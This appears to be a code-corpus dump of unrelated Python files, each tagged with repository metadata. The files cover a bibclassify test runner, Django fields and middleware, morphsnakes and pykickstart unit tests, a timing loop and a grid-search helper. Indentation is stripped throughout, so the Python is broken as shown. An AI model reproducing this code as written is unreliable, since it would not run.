if k not in config[s]:
config[s][k] = []
config[s][k] += v
fo.close()
return config
if __name__ == "__main__":
import os, sys
test_paths = []
if len(sys.argv) > 1 and sys.argv[1] == "demo":
test_paths.append(os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)),
"bibclassify/microtest*.cfg")))
test_paths.append(os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)),
"../../../etc/bibclassify/microtest*.cfg")))
run(test_paths)
elif (len(sys.argv) > 1):
for p in sys.argv[1:]:
if p[0] == os.path.sep: # absolute path
test_paths.append(p)
else: # try to detect if we shall prepend rootdir
first = p.split(os.path.sep)[0]
if os.path.exists(first): #probably relative path
test_paths.append(p)
elif (os.path.join(bconfig.CFG_PREFIX, first)): #relative to root
test_paths.append(os.path.join(bconfig.CFG_PREFIX, p))
log.warning('Resolving relative path %s -> %s' % (p, test_paths[-1]))
else:
raise Exception ('Please check the glob pattern: %s\n\
it seems to be a relative path, but not relative to the script, nor to the invenio rootdir' % p)
run(test_paths)
else:
print 'Usage: %s glob_pattern [glob_pattern...]\nExample: %s %s/etc/bibclassify/microtest*.cfg' % (sys.argv[0],
sys.argv[0],
bconfig.CFG_PREFIX,
)
| pombredanne/invenio-old | modules/bibclassify/lib/bibclassify_microtests.py | Python | gpl-2.0 | 7,289 | 0.005076 |
#/usr/bin/env python
# -#- coding: utf-8 -#-
#
# equity_master/common.py - equity master common classes
#
# standard copy right text
#
# Initial version: 2012-04-02
# Author: Amnon Janiv
"""
.. module:: equity_master/common
:synopsis: miscellaneous abstract classes and other core constructs
.. moduleauthor:: Amnon Janiv
"""
__revision__ = '$Id: $'
__version__ = '0.0.1'
import sys
import logging
from equity_master import util
class UnicodeMixin(object):
"""Unicode mixin class to help in
python 2 to python 3 migration
"""
if sys.version_info[0] >= 3: # Python 3
def __str__(self):
return self.__unicode__()
else:
# Python 2
def __str__(self):
return self.__unicode__().encode('utf8')
class ExecutionError(UnicodeMixin, Exception):
"""Execution error class
"""
def __init__(
self,
traceback=None,
wrapped_ex=None,
args=None,
kwargs=None
):
super(ExecutionError, self).__init__(args, kwargs)
self.traceback = traceback
self.wrapped_ex = wrapped_ex
def __unicode__(self):
return util.pretty_args(*self.args)
class EquityMasterError(ExecutionError):
"""EquityMaster package error class
"""
pass
class ClassMixin(object):
"""Class mixin abstraction
"""
def class_name(self):
return util.class_name(self)
class ErrorMixin(object):
"""Error mixin class
"""
def error(
self,
exc_class,
logger,
tmpl,
*args,
**kwargs
):
"""Log and raise an error"""
util.log_raise(exc_class, logger, logging.ERROR, tmpl, *args, **kwargs)
def fatal(
self,
exc_class,
logger,
tmpl,
*args,
**kwargs):
"""Log and exit"""
pass
class LoggingMixin(object):
"""Log utilities abstraction
"""
def log(
self,
logger,
severity,
tmpl,
*args,
**kwargs
):
util.log(logger, severity, tmpl, *args, **kwargs)
def debug(
self,
logger,
tmpl,
*args,
**kwargs
):
"""Log a debug message"""
util.log(logger, logging.DEBUG, tmpl, *args, **kwargs)
def info(self,
logger,
tmpl,
*args,
**kwargs):
util.log(logger, logging.INFO, tmpl, *args, **kwargs)
def warn(self,
logger,
tmpl,
*args,
**kwargs):
util.log(logger, logging.WARNING, tmpl, *args, **kwargs)
def log_error(self,
logger,
tmpl,
*args,
**kwargs):
util.log(logger, logging.ERROR, tmpl, *args, **kwargs)
class BusinessObject(UnicodeMixin, ClassMixin, ErrorMixin,
LoggingMixin, object):
"""Base class business object
Facilitates creation of complex object graphs with
reduced development and maintenance costs, flexible,
yet with rich functionality
"""
def is_valid(self):
"""Check if object instance is valid
Demonstrates abstract method construct
"""
raise NotImplementedError | ajaniv/equitymaster | equity_master/common.py | Python | gpl-2.0 | 3,296 | 0.01426 |
import ast
import os
class Parser(object):
"""
Find all *.py files inside `repo_path` and parse its into ast nodes.
If file has syntax errors SyntaxError object will be returned except
ast node.
"""
def __init__(self, repo_path):
if not os.path.isabs(repo_path):
raise ValueError('Repository path is not absolute: %s' % repo_path)
self.repo_path = repo_path
def walk(self):
"""
Yield absolute paths to all *.py files inside `repo_path` directory.
"""
for root, dirnames, filenames in os.walk(self.repo_path):
for filename in filenames:
if filename.endswith('.py'):
yield os.path.join(root, filename)
def relpath(self, path):
return os.path.relpath(path, self.repo_path)
def parse_file(self, path):
relpath = self.relpath(path)
with open(path) as f:
content = f.read()
try:
return (relpath, ast.parse(content, relpath))
except SyntaxError, e:
return (relpath, e)
def parse(self):
return dict(self.parse_file(filepath) for filepath in self.walk())
| beni55/djangolint | project/lint/parsers.py | Python | isc | 1,186 | 0 |
# coding=UTF-8
# Copyright 2011 James O'Neill
#
# This file is part of Kapua.
#
# Kapua is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Kapua is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Kapua. If not, see <http://www.gnu.org/licenses/>.
from django.utils.translation import ugettext as _
from django.db import models
#adapted from http://www.djangosnippets.org/snippets/494/
#using UN country and 3 char code list from http://unstats.un.org/unsd/methods/m49/m49alpha.htm
#correct as of 17th October 2008
COUNTRIES = (
('AFG', _('Afghanistan')),
('ALA', _('Aland Islands')),
('ALB', _('Albania')),
('DZA', _('Algeria')),
('ASM', _('American Samoa')),
('AND', _('Andorra')),
('AGO', _('Angola')),
('AIA', _('Anguilla')),
('ATG', _('Antigua and Barbuda')),
('ARG', _('Argentina')),
('ARM', _('Armenia')),
('ABW', _('Aruba')),
('AUS', _('Australia')),
('AUT', _('Austria')),
('AZE', _('Azerbaijan')),
('BHS', _('Bahamas')),
('BHR', _('Bahrain')),
('BGD', _('Bangladesh')),
('BRB', _('Barbados')),
('BLR', _('Belarus')),
('BEL', _('Belgium')),
('BLZ', _('Belize')),
('BEN', _('Benin')),
('BMU', _('Bermuda')),
('BTN', _('Bhutan')),
('BOL', _('Bolivia')),
('BES', _('Bonaire, Saint Eustatius and Saba')),
('BIH', _('Bosnia and Herzegovina')),
('BWA', _('Botswana')),
('BRA', _('Brazil')),
('VGB', _('British Virgin Islands')),
('BRN', _('Brunei Darussalam')),
('BGR', _('Bulgaria')),
('BFA', _('Burkina Faso')),
('BDI', _('Burundi')),
('KHM', _('Cambodia')),
('CMR', _('Cameroon')),
('CAN', _('Canada')),
('CPV', _('Cape Verde')),
('CYM', _('Cayman Islands')),
('CAF', _('Central African Republic')),
('TCD', _('Chad')),
('CIL', _('Channel Islands')),
('CHL', _('Chile')),
('CHN', _('China')),
('HKG', _('China - Hong Kong')),
('MAC', _('China - Macao')),
('COL', _('Colombia')),
('COM', _('Comoros')),
('COG', _('Congo')),
('COK', _('Cook Islands')),
('CRI', _('Costa Rica')),
('CIV', _('Cote d\'Ivoire')),
('HRV', _('Croatia')),
('CUB', _('Cuba')),
('CUW', _(u'Curaçao')),
('CYP', _('Cyprus')),
('CZE', _('Czech Republic')),
('PRK', _('Democratic People\'s Republic of Korea')),
('COD', _('Democratic Republic of the Congo')),
('DNK', _('Denmark')),
('DJI', _('Djibouti')),
('DMA', _('Dominica')),
('DOM', _('Dominican Republic')),
('ECU', _('Ecuador')),
('EGY', _('Egypt')),
('SLV', _('El Salvador')),
('GNQ', _('Equatorial Guinea')),
('ERI', _('Eritrea')),
('EST', _('Estonia')),
('ETH', _('Ethiopia')),
('FRO', _('Faeroe Islands')),
('FLK', _('Falkland Islands (Malvinas)')),
('FJI', _('Fiji')),
('FIN', _('Finland')),
('FRA', _('France')),
('GUF', _('French Guiana')),
('PYF', _('French Polynesia')),
('GAB', _('Gabon')),
('GMB', _('Gambia')),
('GEO', _('Georgia')),
('DEU', _('Germany')),
('GHA', _('Ghana')),
('GIB', _('Gibraltar')),
('GRC', _('Greece')),
('GRL', _('Greenland')),
('GRD', _('Grenada')),
('GLP', _('Guadeloupe')),
('GUM', _('Guam')),
('GTM', _('Guatemala')),
('GGY', _('Guernsey')),
('GIN', _('Guinea')),
('GNB', _('Guinea-Bissau')),
('GUY', _('Guyana')),
('HTI', _('Haiti')),
('VAT', _('Holy See (Vatican City)')),
('HND', _('Honduras')),
('HUN', _('Hungary')),
('ISL', _('Iceland')),
('IND', _('India')),
('IDN', _('Indonesia')),
('IRN', _('Iran')),
('IRQ', _('Iraq')),
('IRL', _('Ireland')),
('IMN', _('Isle of Man')),
('ISR', _('Israel')),
('ITA', _('Italy')),
('JAM', _('Jamaica')),
('JPN', _('Japan')),
('JEY', _('Jersey')),
('JOR', _('Jordan')),
('KAZ', _('Kazakhstan')),
('KEN', _('Kenya')),
('KIR', _('Kiribati')),
('KWT', _('Kuwait')),
('KGZ', _('Kyrgyzstan')),
('LAO', _('Lao People\'s Democratic Republic')),
('LVA', _('Latvia')),
('LBN', _('Lebanon')),
('LSO', _('Lesotho')),
('LBR', _('Liberia')),
('LBY', _('Libyan Arab Jamahiriya')),
('LIE', _('Liechtenstein')),
('LTU', _('Lithuania')),
('LUX', _('Luxembourg')),
('MKD', _('Macedonia')),
('MDG', _('Madagascar')),
('MWI', _('Malawi')),
('MYS', _('Malaysia')),
('MDV', _('Maldives')),
('MLI', _('Mali')),
('MLT', _('Malta')),
('MHL', _('Marshall Islands')),
('MTQ', _('Martinique')),
('MRT', _('Mauritania')),
('MUS', _('Mauritius')),
('MYT', _('Mayotte')),
('MEX', _('Mexico')),
('FSM', _('Micronesia, Federated States of')),
('MCO', _('Monaco')),
('MNG', _('Mongolia')),
('MNE', _('Montenegro')),
('MSR', _('Montserrat')),
('MAR', _('Morocco')),
('MOZ', _('Mozambique')),
('MMR', _('Myanmar')),
('NAM', _('Namibia')),
('NRU', _('Nauru')),
('NPL', _('Nepal')),
('NLD', _('Netherlands')),
('ANT', _('Netherlands Antilles')),
('NCL', _('New Caledonia')),
('NZL', _('New Zealand')),
('NIC', _('Nicaragua')),
('NER', _('Niger')),
('NGA', _('Nigeria')),
('NIU', _('Niue')),
('NFK', _('Norfolk Island')),
('MNP', _('Northern Mariana Islands')),
('NOR', _('Norway')),
('PSE', _('Occupied Palestinian Territory')),
('OMN', _('Oman')),
('PAK', _('Pakistan')),
('PLW', _('Palau')),
('PAN', _('Panama')),
('PNG', _('Papua New Guinea')),
('PRY', _('Paraguay')),
('PER', _('Peru')),
('PHL', _('Philippines')),
('PCN', _('Pitcairn')),
('POL', _('Poland')),
('PRT', _('Portugal')),
('PRI', _('Puerto Rico')),
('QAT', _('Qatar')),
('KOR', _('Republic of Korea')),
('MDA', _('Republic of Moldova')),
('REU', _('Reunion')),
('ROU', _('Romania')),
('RUS', _('Russian Federation')),
('RWA', _('Rwanda')),
('BLM', _('Saint-Barthelemy')),
('SHN', _('Saint Helena')),
('KNA', _('Saint Kitts and Nevis')),
('LCA', _('Saint Lucia')),
('MAF', _('Saint-Martin (French part)')),
('SPM', _('Saint Pierre and Miquelon')),
('VCT', _('Saint Vincent and the Grenadines')),
('WSM', _('Samoa')),
('SMR', _('San Marino')),
('STP', _('Sao Tome and Principe')),
('SAU', _('Saudi Arabia')),
('SEN', _('Senegal')),
('SRB', _('Serbia')),
('SYC', _('Seychelles')),
('SLE', _('Sierra Leone')),
('SGP', _('Singapore')),
('SXM', _('Sint Maarten (Dutch part)')),
('SVK', _('Slovakia')),
('SVN', _('Slovenia')),
('SLB', _('Solomon Islands')),
('SOM', _('Somalia')),
('ZAF', _('South Africa')),
('SSD', _('South Sudan')),
('ESP', _('Spain')),
('LKA', _('Sri Lanka')),
('SDN', _('Sudan')),
('SUR', _('Suriname')),
('SJM', _('Svalbard and Jan Mayen Islands')),
('SWZ', _('Swaziland')),
('SWE', _('Sweden')),
('CHE', _('Switzerland')),
('SYR', _('Syrian Arab Republic')),
('TJK', _('Tajikistan')),
('THA', _('Thailand')),
('TLS', _('Timor-Leste')),
('TGO', _('Togo')),
('TKL', _('Tokelau')),
('TON', _('Tonga')),
('TTO', _('Trinidad and Tobago')),
('TUN', _('Tunisia')),
('TUR', _('Turkey')),
('TKM', _('Turkmenistan')),
('TCA', _('Turks and Caicos Islands')),
('TUV', _('Tuvalu')),
('UGA', _('Uganda')),
('UKR', _('Ukraine')),
('ARE', _('United Arab Emirates')),
('GBR', _('United Kingdom')),
('TZA', _('United Republic of Tanzania')),
('USA', _('United States of America')),
('VIR', _('United States Virgin Islands')),
('URY', _('Uruguay')),
('UZB', _('Uzbekistan')),
('VUT', _('Vanuatu')),
('VEN', _('Venezuela (Bolivarian Republic of)')),
('VNM', _('Viet Nam')),
('WLF', _('Wallis and Futuna Islands')),
('ESH', _('Western Sahara')),
('YEM', _('Yemen')),
('ZMB', _('Zambia')),
('ZWE', _('Zimbabwe')),
)
class CountryField(models.CharField):
def __init__(self, *args, **kwargs):
kwargs.setdefault('max_length', 3)
kwargs.setdefault('choices', COUNTRIES)
super(CountryField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "CharField"
| hemebond/kapua | forms.py | Python | gpl-3.0 | 7,905 | 0.031883 |
import numpy as np
from morphsnakes import (morphological_chan_vese,
morphological_geodesic_active_contour,
inverse_gaussian_gradient,
circle_level_set, checkerboard_level_set)
from numpy.testing import assert_array_equal
import pytest
def gaussian_blob():
coords = np.mgrid[-5:6, -5:6]
sqrdistances = (coords ** 2).sum(0)
return np.exp(-sqrdistances / 10)
def test_morphsnakes_incorrect_image_shape():
img = np.zeros((10, 10, 3))
ls = np.zeros((10, 9))
with pytest.raises(ValueError):
morphological_chan_vese(img, iterations=1, init_level_set=ls)
with pytest.raises(ValueError):
morphological_geodesic_active_contour(img, iterations=1,
init_level_set=ls)
def test_morphsnakes_incorrect_ndim():
img = np.zeros((4, 4, 4, 4))
ls = np.zeros((4, 4, 4, 4))
with pytest.raises(ValueError):
morphological_chan_vese(img, iterations=1, init_level_set=ls)
with pytest.raises(ValueError):
morphological_geodesic_active_contour(img, iterations=1,
init_level_set=ls)
def test_morphsnakes_black():
img = np.zeros((11, 11))
ls = circle_level_set(img.shape, (5, 5), 3)
ref_zeros = np.zeros(img.shape, dtype=np.int8)
ref_ones = np.ones(img.shape, dtype=np.int8)
acwe_ls = morphological_chan_vese(img, iterations=6, init_level_set=ls)
assert_array_equal(acwe_ls, ref_zeros)
gac_ls = morphological_geodesic_active_contour(img, iterations=6,
init_level_set=ls)
assert_array_equal(gac_ls, ref_zeros)
gac_ls2 = morphological_geodesic_active_contour(img, iterations=6,
init_level_set=ls,
balloon=1, threshold=-1,
smoothing=0)
assert_array_equal(gac_ls2, ref_ones)
assert acwe_ls.dtype == gac_ls.dtype == gac_ls2.dtype == np.int8
def test_morphsnakes_simple_shape_chan_vese():
img = gaussian_blob()
ls1 = circle_level_set(img.shape, (5, 5), 3)
ls2 = circle_level_set(img.shape, (5, 5), 6)
acwe_ls1 = morphological_chan_vese(img, iterations=10, init_level_set=ls1)
acwe_ls2 = morphological_chan_vese(img, iterations=10, init_level_set=ls2)
assert_array_equal(acwe_ls1, acwe_ls2)
assert acwe_ls1.dtype == acwe_ls2.dtype == np.int8
def test_morphsnakes_simple_shape_geodesic_active_contour():
img = np.float_(circle_level_set((11, 11), (5, 5), 3.5))
gimg = inverse_gaussian_gradient(img, alpha=10.0, sigma=1.0)
ls = circle_level_set(img.shape, (5, 5), 6)
ref = np.array([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]],
dtype=np.int8)
gac_ls = morphological_geodesic_active_contour(gimg, iterations=10,
init_level_set=ls,
balloon=-1)
assert_array_equal(gac_ls, ref)
assert gac_ls.dtype == np.int8
def test_init_level_sets():
image = np.zeros((6, 6))
checkerboard_ls = morphological_chan_vese(image, 0, 'checkerboard')
checkerboard_ref = np.array([[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 0]], dtype=np.int8)
circle_ls = morphological_geodesic_active_contour(image, 0, 'circle')
circle_ref = np.array([[0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 0]], dtype=np.int8)
ellipsoid_ls = morphological_chan_vese(np.zeros((7, 9)), 0, 'ellipsoid')
ellipsoid_ref = np.array(
[[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0]],
dtype=np.uint8
)
assert_array_equal(checkerboard_ls, checkerboard_ref)
assert_array_equal(circle_ls, circle_ref)
assert_array_equal(ellipsoid_ls, ellipsoid_ref)
def test_morphsnakes_3d():
image = np.zeros((7, 7, 7))
evolution = []
def callback(x):
evolution.append(x.sum())
ls = morphological_chan_vese(image, 5, 'circle',
iter_callback=callback)
# Check that the initial circle level set is correct
assert evolution[0] == 81
# Check that the final level set is correct
assert ls.sum() == 0
# Check that the contour is shrinking at every iteration
for v1, v2 in zip(evolution[:-1], evolution[1:]):
assert v1 >= v2
if __name__ == "__main__":
np.testing.run_module_suite()
| pmneila/morphsnakes | test_morphsnakes.py | Python | bsd-3-clause | 5,724 | 0 |
#
# Martin Gracik <mgracik@redhat.com>
#
# Copyright 2009 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat
# trademarks that are incorporated in the source code or documentation are not
# subject to the GNU General Public License and may only be used or replicated
# with the express permission of Red Hat, Inc.
#
import unittest
from tests.baseclass import CommandTest, CommandSequenceTest
from pykickstart.errors import KickstartParseError, KickstartValueError
class FC6_TestCase(CommandTest):
command = "user"
def runTest(self):
# pass
self.assert_parse("user --name=user", "user --name=user\n")
self.assert_parse("user --name=user --groups=grp1,grp2 --homedir=/home/user --shell=/bin/bash --uid=1000 --password=secret --iscrypted",
"user --groups=grp1,grp2 --homedir=/home/user --name=user --password=secret --iscrypted --shell=/bin/bash --uid=1000\n")
self.assert_parse("user --name=user --groups=grp1", "user --groups=grp1 --name=user\n")
self.assert_parse("user --name=user --homedir=/home/user --shell=/bin/bash", "user --homedir=/home/user --name=user --shell=/bin/bash\n")
self.assert_parse("user --name=user --password=secret", "user --name=user --password=secret\n")
self.assert_parse("user --name=user --uid=1000", "user --name=user --uid=1000\n")
self.assertFalse(self.assert_parse("user --name=user") == None)
self.assertTrue(self.assert_parse("user --name=userA") != \
self.assert_parse("user --name=userB"))
self.assertFalse(self.assert_parse("user --name=userA") == \
self.assert_parse("user --name=userB"))
# fail
# missing required option --name
self.assert_parse_error("user", KickstartValueError)
# --name requires an argument
self.assert_parse_error("user --name", KickstartParseError)
# --uid requires int argument
self.assert_parse_error("user --name=user --uid=id", KickstartParseError)
# unknown option
self.assert_parse_error("user --name=user --unknown=value", KickstartParseError)
# required option arguments
self.assert_parse_error("user --name=user --groups", KickstartParseError)
self.assert_parse_error("user --name=user --homedir", KickstartParseError)
self.assert_parse_error("user --name=user --shell", KickstartParseError)
self.assert_parse_error("user --name=user --uid", KickstartParseError)
self.assert_parse_error("user --name=user --password", KickstartParseError)
class FC6_Duplicate_TestCase(CommandSequenceTest):
def runTest(self):
# pass - can use the command twice, as long as they have different names
self.assert_parse("""
user --name=userA
user --name=userB""")
# fail - can't have two users with the same name
self.assert_parse_error("""
user --name=userA
user --name=userA""", UserWarning)
class F8_TestCase(FC6_TestCase):
def runTest(self):
# run FC6 test case
FC6_TestCase.runTest(self)
# pass
self.assert_parse("user --name=user --lock --plaintext", "user --name=user --lock\n")
self.assert_parse("user --name=user --lock", "user --name=user --lock\n")
self.assert_parse("user --name=user --plaintext", "user --name=user\n")
# fail
class F12_TestCase(F8_TestCase):
def runTest(self):
# run F8 test case
F8_TestCase.runTest(self)
# pass
self.assert_parse("user --name=user --gecos=\"User Name\"", "user --name=user --gecos=\"User Name\"\n")
class F19_TestCase(F12_TestCase):
def runTest(self):
# run F12 test case
F12_TestCase.runTest(self)
# pass
self.assert_parse("user --name=user --gid=500", "user --name=user --gid=500\n")
if __name__ == "__main__":
unittest.main()
| cgwalters/pykickstart | tests/commands/user.py | Python | gpl-2.0 | 4,536 | 0.005291 |
import time
DEFAULT_SLEEP_FACTOR = 0.8
class Loop(object):
class LoopInterruptException(Exception):
pass
def __init__(self, fps, timeshift=0, sleep_factor=DEFAULT_SLEEP_FACTOR):
"""
Sleep factor could be set to 1.0? as python 3.5 respects time better
"""
self.set_period(fps, timeshift)
self.profile_timelog = []
self.sleep_factor = sleep_factor
def set_period(self, fps, timeshift=0):
assert fps > 0, 'fps rate must be provided'
assert timeshift >= 0, 'timeshift must be positive'
self.fps = fps
self.period = 1 / fps
self.start_time = time.time() - timeshift
self.previous_time = time.time() - self.period # Previous time is one frame ago to trigger immediately
return self.period
def get_frame(self, timestamp):
return int((timestamp - self.start_time) // self.period)
def is_running(self):
return self.running
def run(self):
self.running = True
try:
while self.is_running() and self.period:
self.current_time = time.time()
current_frame = self.get_frame(self.current_time)
previous_frame = self.get_frame(self.previous_time)
for frame in range(previous_frame, current_frame):
self.render(frame + 1)
self.previous_time = self.current_time
sleep_time = (self.start_time + (self.period * (current_frame + 1)) - time.time()) * self.sleep_factor
if sleep_time > 0:
time.sleep(sleep_time)
except KeyboardInterrupt:
pass
except self.LoopInterruptException:
pass
self.close()
def close(self):
pass
def render(self, frame):
"""
This method is to be overridden under normal operation.
The implementation here is useful for measuring the accuracy of the rendered frames.
self.profile_timelog contains the time the redered frame was out from it's expected time.
This is useful to run and average
"""
#print('{0} {1}'.format(frame, time.time()))
self.profile_timelog.append(self.current_time - (self.start_time + (self.period * frame)))
if frame > (self.fps*20):
average_frame_inacuracy = sum(self.profile_timelog)/len(self.profile_timelog)
average_off_percent = average_frame_inacuracy / self.period
variance = max(self.profile_timelog) - min(self.profile_timelog)
print('average_frame_inacuracy: {0} average_off_percent: {1:.2%} variance: {2}'.format(average_frame_inacuracy, average_off_percent, variance))
self.running = False
if __name__ == "__main__":
Loop(60).loop()
| calaldees/libs | python3/calaldees/loop.py | Python | gpl-3.0 | 2,814 | 0.002843 |
import os
import sys
from setuptools import setup, find_packages, Command
from commands import *
tests_require=['pytest-cov', 'pytest', 'testfixtures']
setup(
name=name,
version=read_version(),
description='A regex based file organizer',
long_description=open(os.path.join(base_dir, 'description.txt')).read().strip(),
license='MPL',
url='https://github.com/chriscz/pySorter',
author='Chris Coetzee',
author_email='chriscz93@gmail.com',
packages=find_packages(),
setup_requires=['pytest-runner'],
tests_require=tests_require,
include_package_data=True,
zip_safe=False,
cmdclass={
'test': PyTestCommand,
'coverage': CoverageCommand,
'bump': BumpVersionCommand,
},
entry_points={
"console_scripts": ['pysorter=pysorter.commandline:main']
},
extras_require=dict(
build=['twine', 'wheel', 'setuptools-git', 'sphinx'],
test=['pytest', 'testfixtures', 'pytest-cov'],
),
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
"Topic :: Utilities",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
]
)
| chriscz/pySorter | setup.py | Python | gpl-3.0 | 1,350 | 0.001481 |
from lacuna.building import MyBuilding
class ssld(MyBuilding):
path = 'ssld'
def __init__( self, client, body_id:int = 0, building_id:int = 0 ):
super().__init__( client, body_id, building_id )
| tmtowtdi/MontyLacuna | lib/lacuna/buildings/boring/ssld.py | Python | mit | 213 | 0.032864 |
# -*- coding: utf-8 -*-
"""
Edit Toolbar middleware
"""
from cms.utils.conf import get_cms_setting
from cms.toolbar.toolbar import CMSToolbar
from cms.utils.i18n import force_language
from django.contrib.admin.models import LogEntry, ADDITION, CHANGE
from menus.menu_pool import menu_pool
from django.http import HttpResponse
from django.template.loader import render_to_string
from cms.utils.placeholder import get_toolbar_plugin_struct
def toolbar_plugin_processor(instance, placeholder, rendered_content, original_context):
from cms.plugin_pool import plugin_pool
original_context.push()
child_plugin_classes = []
plugin_class = instance.get_plugin_class()
if plugin_class.allow_children:
inst, plugin = instance.get_plugin_instance()
page = original_context['request'].current_page
children = [plugin_pool.get_plugin(cls) for cls in plugin.get_child_classes(placeholder, page)]
# Builds the list of dictionaries containing module, name and value for the plugin dropdowns
child_plugin_classes = get_toolbar_plugin_struct(children, placeholder.slot, placeholder.page,
parent=plugin_class)
instance.placeholder = placeholder
request = original_context['request']
with force_language(request.toolbar.toolbar_language):
data = {
'instance': instance,
'rendered_content': rendered_content,
'child_plugin_classes': child_plugin_classes,
'edit_url': placeholder.get_edit_url(instance.pk),
'add_url': placeholder.get_add_url(),
'delete_url': placeholder.get_delete_url(instance.pk),
'move_url': placeholder.get_move_url(),
}
original_context.update(data)
plugin_class = instance.get_plugin_class()
template = plugin_class.frontend_edit_template
output = render_to_string(template, original_context).strip()
original_context.pop()
return output
class ToolbarMiddleware(object):
"""
Middleware to set up CMS Toolbar.
"""
def process_request(self, request):
"""
If we should show the toolbar for this request, put it on
request.toolbar. Then call the request_hook on the toolbar.
"""
edit_on = get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')
edit_off = get_cms_setting('CMS_TOOLBAR_URL__EDIT_OFF')
build = get_cms_setting('CMS_TOOLBAR_URL__BUILD')
if request.user.is_staff or request.user.is_anonymous():
if edit_on in request.GET and not request.session.get('cms_edit', False):
if not request.session.get('cms_edit', False):
menu_pool.clear()
request.session['cms_edit'] = True
if request.session.get('cms_build', False):
request.session['cms_build'] = False
if edit_off in request.GET and request.session.get('cms_edit', True):
if request.session.get('cms_edit', True):
menu_pool.clear()
request.session['cms_edit'] = False
if request.session.get('cms_build', False):
request.session['cms_build'] = False
if build in request.GET and not request.session.get('cms_build', False):
request.session['cms_build'] = True
else:
request.session['cms_build'] = False
request.session['cms_edit'] = False
if request.user.is_staff:
try:
request.cms_latest_entry = LogEntry.objects.filter(
user=request.user,
action_flag__in=(ADDITION, CHANGE)
).only('pk').order_by('-pk')[0].pk
except IndexError:
request.cms_latest_entry = -1
request.toolbar = CMSToolbar(request)
def process_view(self, request, view_func, view_args, view_kwarg):
response = request.toolbar.request_hook()
if isinstance(response, HttpResponse):
return response
def process_response(self, request, response):
from django.utils.cache import add_never_cache_headers
found = False
if hasattr(request, 'toolbar') and request.toolbar.edit_mode:
found = True
for placeholder in getattr(request, 'placeholders', []):
if not placeholder.cache_placeholder:
found = True
break
if found:
add_never_cache_headers(response)
if hasattr(request, 'user') and request.user.is_staff and response.status_code != 500:
try:
pk = LogEntry.objects.filter(
user=request.user,
action_flag__in=(ADDITION, CHANGE)
).only('pk').order_by('-pk')[0].pk
if hasattr(request, 'cms_latest_entry') and request.cms_latest_entry != pk:
log = LogEntry.objects.filter(user=request.user, action_flag__in=(ADDITION, CHANGE))[0]
request.session['cms_log_latest'] = log.pk
# If there were no LogEntries, just don't touch the session.
# Note that in the case of a user logging-in as another user,
# request may have a cms_latest_entry attribute, but there are no
# LogEntries for request.user.
except IndexError:
pass
return response
| vstoykov/django-cms | cms/middleware/toolbar.py | Python | bsd-3-clause | 5,441 | 0.001838 |
"""
Gridsearch implementation
"""
from hops import hdfs, tensorboard, devices
from hops.experiment_impl.util import experiment_utils
from hops.experiment import Direction
import threading
import six
import time
import os
def _run(sc, train_fn, run_id, args_dict, direction=Direction.MAX, local_logdir=False, name="no-name", optimization_key=None):
"""
Run the wrapper function with each hyperparameter combination as specified by the dictionary
Args:
sc:
train_fn:
args_dict:
direction:
local_logdir:
name:
Returns:
"""
app_id = str(sc.applicationId)
num_executions = 1
if direction.upper() != Direction.MAX and direction.upper() != Direction.MIN:
raise ValueError('Invalid direction ' + direction + ', must be Direction.MAX or Direction.MIN')
arg_lists = list(args_dict.values())
currentLen = len(arg_lists[0])
for i in range(len(arg_lists)):
if currentLen != len(arg_lists[i]):
raise ValueError('Length of each function argument list must be equal')
num_executions = len(arg_lists[i])
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
#Make SparkUI intuitive by grouping jobs
sc.setJobGroup(os.environ['ML_ID'], "{} | Grid Search".format(name))
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, train_fn, args_dict, local_logdir, optimization_key))
